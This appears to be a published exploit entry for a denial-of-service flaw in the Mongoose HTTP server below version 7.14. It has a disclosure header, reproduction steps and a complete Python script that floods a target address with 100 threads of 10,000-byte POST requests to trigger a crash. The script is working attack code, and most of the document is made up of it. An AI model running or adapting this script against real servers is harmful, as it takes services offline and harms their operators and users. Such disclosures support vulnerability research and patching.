📄 Mongoose HTTP Denial of Service

# Exploit Title: Mongoose HTTP < 7.14 DDOS Stack-Based Free()
    # Discovered by: Yehia Elghaly
    # Discovered Date: 2025-06-11
    # Vendor Homepage: https://mongoose.ws/
    # Software Link : https://github.com/cesanta/mongoose/tree/7.14
    # Tested Version:  < 7.14
    # Vulnerability Type: DDOS Stack-Based
    # Tested on OS: Windows 10 - Windows 11 
    
    # Steps to reproduce:
    # 1. - Run Mongoose  < 7.14
    # 2. - Run the python script - It will crash
    
    # Note: The bug didn’t always cause a crash on the first test, you may need to run the python scripts few times that because the result of free() on a stack address is undefined behavior. Sometimes it works. Sometimes it silently corrupts memory. Sometimes the heap manager doesn’t detect it… until it’s too late.
    
    # The Vendor had been notified and fixed the bug
    
    #!/usr/bin/python
    
    import requests
    import threading
    import time
    
    URL = "http://192.168.166.131:8000"
    THREAD_COUNT = 100  
    REQUESTS_PER_THREAD = 200  
    LARGE_BODY = "A" * 10000  
    
    def make_requests(thread_id):
        for i in range(REQUESTS_PER_THREAD):
            try:
                r = requests.post(URL, data=LARGE_BODY, timeout=1)
                print(f"[Thread {thread_id}] Request {i+1}: {r.status_code}")
            except requests.exceptions.RequestException as e:
                print(f"[Thread {thread_id}] Request {i+1} failed: {e}")
    
    threads = []
    start_time = time.time()
    for i in range(THREAD_COUNT):
        t = threading.Thread(target=make_requests, args=(i,))
        t.start()
        threads.append(t)
    
    for t in threads:
        t.join()
    
    print(f"Completed in {time.time() - start_time:.2f} seconds")